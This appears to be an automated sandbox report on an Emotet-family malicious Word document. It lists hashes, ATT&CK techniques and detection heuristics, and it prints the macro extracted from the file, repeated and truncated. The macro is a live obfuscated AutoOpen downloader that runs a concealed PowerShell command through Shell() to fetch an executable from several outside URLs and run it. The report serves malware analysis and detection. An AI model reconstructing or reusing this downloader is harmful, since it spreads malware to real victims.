Emotet Office (OLE) malware analysis — malicious · e80c62b1bc6baa07

MALICIOUS

Office (OLE)

75.2 KB Created: 2018-09-03 20:29:00 Authoring application: Microsoft Office Word First seen: 2019-03-18

MD5: 2f0ae7b184da87027fcdc29d4f7d6d76 SHA-1: ac0872e9e31bdef23a47cb4a2f53e3b831c2d8e6 SHA-256: e80c62b1bc6baa07d65f49a9be93e62ed88cd19a4e06c406fc8d40cc6a427406

202 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, specifically an AutoOpen macro that utilizes the Shell() function. This indicates an attempt to download and execute a secondary payload. The ClamAV detection name 'Doc.Downloader.Emotet-6884103-0' strongly suggests the Emotet family. The VBA script's use of Shell() and the AutoOpen macro are key indicators of this downloader behavior.

Heuristics 6

ClamAV: Doc.Downloader.Emotet-6884103-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6884103-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4869 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4869 bytes
SHA-256: `c2face349f4f324954309a8b4c3cbb870d69d49d5727db213b8a1b55175310ef`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "pnzbBkAEkvILAI" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On _ Error _ Resume _ Next Hour "nrhInichYGw" + "GULslcwDhnfk" Hour "179806134" + "3042" + "cz" + "499249810" VBA.Shell KeyString(6 + 5 + 4 + 8 + 44) + tRjwcmXw + PYcIqGzmztDQ + XEqCAUEknpl + IuKjcwj + zwRGzLwvAXjQ + UEjYwIWE, 57 - 57 Hour "rhjwOtEcw" + "5784" Hour "SG" + "uHqj" + "cwUCj" + "VR" Hour "7586" + "dVRwBnTYFZZOsS" + "KiSMMvcW" + "Sfw" End Sub Attribute VB_Name = "fViaJjkDBwDdV" Function XEqCAUEknpl() On _ Error _ Resume _ Next Hour "144618918" + "60127637" + "74493391" + "94834062" Hour "EoJ" + "F" Hour "Vn" + "LvYZ" Hour "AjacQAW" + "lYfX" + "dN" + "P" OiWhIPJLV = "md" + " /V^:^" + "O" + "N" + "/C" + Chr(2 + 5 + 3 + 2 + 22) + "^s^" + "et V" + "^x= ^ " + "^ ^ " + "^ " + " ^ ^" Hour "KEFNJUjnWN" + "rsHfCFnJ" + "387373281" + "1544" Hour "jq" + "Vcz" + "5949" + "O" Hour "OB" + "144517342" Hour "RwUsU" + "OSOwRuaz" + "Jw" + "fn" IBdjcd = " ^ ^" + " " + "}}^{^h" + "c^t" + "ac};k" + "^aer^b" Hour "iKMdK" + "zOPA" + "hj" + "rzzd" Hour "RfRswbpauPEX" + "6674" mzFRzoGtWfI = ";NET$^" + " m^e" + "^t^I" + "-e" + "k" + "ovn^I" + ";)NE^T$" + "^ ,^" + "f" + "^U^" + "X" Hour "vAjKkn" + "397685715" jDDNjNtVw = "$(eliF" + "d^aol" + "nw^o^D^" + ".ii^U${" + "yr^t^{)" Hour "j" + "mbY" + "icTBjBa" + "Onw" Hour "UwzwwTTmEJhbT" + "205842874" Hour "147443864" + "YKYJKHof" + "439119945" + "iICtUfjJZU" Hour "qaJOLU" + "wZz" + "108882266" + "7110" Hour "174505011" + "466709728" jKIIOtiiclQ = "^LwV" + "^" + "$" + "^" + " n^i" + " ^f" + "U^X^" + "$(hcaer" + "o^f;'" + "exe" + ".'^+^w" + "Dv$^+'" + "\'" Hour "YFEd" + "uCTk" + "317004979" + "dljMvDG" Hour "s" + "1226" + "dJhYWGlWj" + "QSsMqVjio" Hour "6534" + "WBbGM" + "IcwjfIuz" + "G" DSzazDnT = "+c" + "^ilbu" + "^p" + "^:vn^" + "e$^" + "=N" + "E^T$^" Hour "1059" + "KOcth" Hour "JwOlPIL" + "965" QHjDRBLF = ";" + "'3^1" + "^" + "3'^ " + "^= wDv^" + "$^;)" + "'^@'(^t" + "^il" + "^pS" + "^" + ".^'" + "^LrR" + "^f5^p" Hour "380650044" + "5799" + "wEfNY" + "399199336" Hour "6033" + "qr" + "AJMKcKwHJ" + "VVzN" Hour "ti" + "EtHZzM" Hour "6098" + "297176320" kNRPWmFumnD = "q^j^T" + "^o/mo" + "c.^tne" + "^l" + "^at^l" Hour "2568" + "k" Hour "vCYRbvqwOzIwdY" + "pRQzABsV" Hour "405137494" + "HDtUL" Hour "235317130" + "q" + "5713" + "uJSD" Hour "nvtQmDDDp" + "VfhO" + "oS" + "GDjTuNabuCh" Hour "184539444" + "HXoO" + "zFON" + "bYLXlbljcWILdY" WVwIIPMf = "^la" + "^s^a" + "^h//:^p" + "tth^@" + "^s^h" Hour "iTm" + "rk" Hour "JUi" + "395432632" + "PUBjpL" + "AV" Hour "fit" + "ZTJIHT" + "326081667" + "npMj" Hour "UnzVuRTm" + "5755" CiLjFKGVHi = "x^1^a" + "U^s^tR^" + "t" + "/t^" + "en^.sr" + "otc^ar" + "^tnoc-" + "^e" + "^g^" + "atire" + "h//" Hour "BARUR" + "62814639" Hour "7680" + "3969" jAOCqmNBW = ":p^tth" + "^" + "@t^Pu^8" + "I^k^E" + "/" + "zk.^1ik" + "ira" + "h" + "s^.^" + "z^ak/" + "/" Hour "7405" + "j" + "A" + "2620" Hour "wwWA" + "184339221" Hour "FzSn" + "PZM" + "4986" + "aN" Hour "zjhrz" + "4331" OzupjEiUd = ":p^" + "t" + "^th^" + "@fHw3" + "^G^KVH" + "D^u/moc" + "." + "s" + "e^la^" XEqCAUEknpl = OiWhIPJLV + IBdjcd + mzFRzoGtWfI + jDDNjNtVw + jKIIOtiiclQ + DSzazDnT + QHjDRBLF + kNRPWmFumnD + WVwIIPMf + CiLjFKGVHi + jAOCqmNBW + OzupjEiUd Hour "L" + "abCEuNjJ" + "pKVz" + "6970" Hour "420390399" + "254672433" Hour "503597402" + "9519" End Function Function IuKjcwj() On _ Error _ Resume _ Next Hour "D" + "wchLEEBD" + "3905" + "J" Hour "2122" + "KUb" + "FTACFDwa" + "5117" Hour "BlwKYSSkJTkit" + "517546786" ObIAKo = "sotu^" + "a^si" + "va^dlu^" + "a^p" + "//^:^" + "p^tth^@" + "M^" + "E^" + "Etns^" + "XAp/^" + "k^s^.c^" + "iv^o^so" Hour "cBP" + "2485" jBQErMMjX = "^tr^ab" + "//:" + "p^tt^h^" + ... (truncated)

SHA-256: c2face349f4f324954309a8b4c3cbb870d69d49d5727db213b8a1b55175310ef

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "pnzbBkAEkvILAI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
   Hour "nrhInichYGw" + "GULslcwDhnfk"
   Hour "179806134" + "3042" + "cz" + "499249810"
VBA.Shell KeyString(6 + 5 + 4 + 8 + 44) + tRjwcmXw + PYcIqGzmztDQ + XEqCAUEknpl + IuKjcwj + zwRGzLwvAXjQ + UEjYwIWE, 57 - 57
   Hour "rhjwOtEcw" + "5784"
   Hour "SG" + "uHqj" + "cwUCj" + "VR"
   Hour "7586" + "dVRwBnTYFZZOsS" + "KiSMMvcW" + "Sfw"
End Sub



Attribute VB_Name = "fViaJjkDBwDdV"
Function XEqCAUEknpl()

On _
Error _
Resume _
Next
Hour "144618918" + "60127637" + "74493391" + "94834062"
   Hour "EoJ" + "F"
   Hour "Vn" + "LvYZ"
   Hour "AjacQAW" + "lYfX" + "dN" + "P"
OiWhIPJLV = "md" + " /V^:^" + "O" + "N" + "/C" + Chr(2 + 5 + 3 + 2 + 22) + "^s^" + "et V" + "^x= ^  " + "^ ^    " + "^  " + " ^  ^"
Hour "KEFNJUjnWN" + "rsHfCFnJ" + "387373281" + "1544"
   Hour "jq" + "Vcz" + "5949" + "O"
   Hour "OB" + "144517342"
   Hour "RwUsU" + "OSOwRuaz" + "Jw" + "fn"
IBdjcd = "  ^ ^" + " " + "}}^{^h" + "c^t" + "ac};k" + "^aer^b"
Hour "iKMdK" + "zOPA" + "hj" + "rzzd"
   Hour "RfRswbpauPEX" + "6674"
mzFRzoGtWfI = ";NET$^" + " m^e" + "^t^I" + "-e" + "k" + "ovn^I" + ";)NE^T$" + "^ ,^" + "f" + "^U^" + "X"
Hour "vAjKkn" + "397685715"
jDDNjNtVw = "$(eliF" + "d^aol" + "nw^o^D^" + ".ii^U${" + "yr^t^{)"
Hour "j" + "mbY" + "icTBjBa" + "Onw"
   Hour "UwzwwTTmEJhbT" + "205842874"
   Hour "147443864" + "YKYJKHof" + "439119945" + "iICtUfjJZU"
   Hour "qaJOLU" + "wZz" + "108882266" + "7110"
   Hour "174505011" + "466709728"
jKIIOtiiclQ = "^LwV" + "^" + "$" + "^" + " n^i" + " ^f" + "U^X^" + "$(hcaer" + "o^f;'" + "exe" + ".'^+^w" + "Dv$^+'" + "\'"
Hour "YFEd" + "uCTk" + "317004979" + "dljMvDG"
   Hour "s" + "1226" + "dJhYWGlWj" + "QSsMqVjio"
   Hour "6534" + "WBbGM" + "IcwjfIuz" + "G"
DSzazDnT = "+c" + "^ilbu" + "^p" + "^:vn^" + "e$^" + "=N" + "E^T$^"
Hour "1059" + "KOcth"
   Hour "JwOlPIL" + "965"
QHjDRBLF = ";" + "'3^1" + "^" + "3'^ " + "^= wDv^" + "$^;)" + "'^@'(^t" + "^il" + "^pS" + "^" + ".^'" + "^LrR" + "^f5^p"
Hour "380650044" + "5799" + "wEfNY" + "399199336"
   Hour "6033" + "qr" + "AJMKcKwHJ" + "VVzN"
   Hour "ti" + "EtHZzM"
   Hour "6098" + "297176320"
kNRPWmFumnD = "q^j^T" + "^o/mo" + "c.^tne" + "^l" + "^at^l"
Hour "2568" + "k"
   Hour "vCYRbvqwOzIwdY" + "pRQzABsV"
   Hour "405137494" + "HDtUL"
   Hour "235317130" + "q" + "5713" + "uJSD"
   Hour "nvtQmDDDp" + "VfhO" + "oS" + "GDjTuNabuCh"
   Hour "184539444" + "HXoO" + "zFON" + "bYLXlbljcWILdY"
WVwIIPMf = "^la" + "^s^a" + "^h//:^p" + "tth^@" + "^s^h"
Hour "iTm" + "rk"
   Hour "JUi" + "395432632" + "PUBjpL" + "AV"
   Hour "fit" + "ZTJIHT" + "326081667" + "npMj"
   Hour "UnzVuRTm" + "5755"
CiLjFKGVHi = "x^1^a" + "U^s^tR^" + "t" + "/t^" + "en^.sr" + "otc^ar" + "^tnoc-" + "^e" + "^g^" + "atire" + "h//"
Hour "BARUR" + "62814639"
   Hour "7680" + "3969"
jAOCqmNBW = ":p^tth" + "^" + "@t^Pu^8" + "I^k^E" + "/" + "zk.^1ik" + "ira" + "h" + "s^.^" + "z^ak/" + "/"
Hour "7405" + "j" + "A" + "2620"
   Hour "wwWA" + "184339221"
   Hour "FzSn" + "PZM" + "4986" + "aN"
   Hour "zjhrz" + "4331"
OzupjEiUd = ":p^" + "t" + "^th^" + "@fHw3" + "^G^KVH" + "D^u/moc" + "." + "s" + "e^la^"
XEqCAUEknpl = OiWhIPJLV + IBdjcd + mzFRzoGtWfI + jDDNjNtVw + jKIIOtiiclQ + DSzazDnT + QHjDRBLF + kNRPWmFumnD + WVwIIPMf + CiLjFKGVHi + jAOCqmNBW + OzupjEiUd
   Hour "L" + "abCEuNjJ" + "pKVz" + "6970"
   Hour "420390399" + "254672433"
   Hour "503597402" + "9519"
End Function
Function IuKjcwj()

On _
Error _
Resume _
Next
Hour "D" + "wchLEEBD" + "3905" + "J"
   Hour "2122" + "KUb" + "FTACFDwa" + "5117"
   Hour "BlwKYSSkJTkit" + "517546786"
ObIAKo = "sotu^" + "a^si" + "va^dlu^" + "a^p" + "//^:^" + "p^tth^@" + "M^" + "E^" + "Etns^" + "XAp/^" + "k^s^.c^" + "iv^o^so"
Hour "cBP" + "2485"
jBQErMMjX = "^tr^ab" + "//:" + "p^tt^h^" + 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.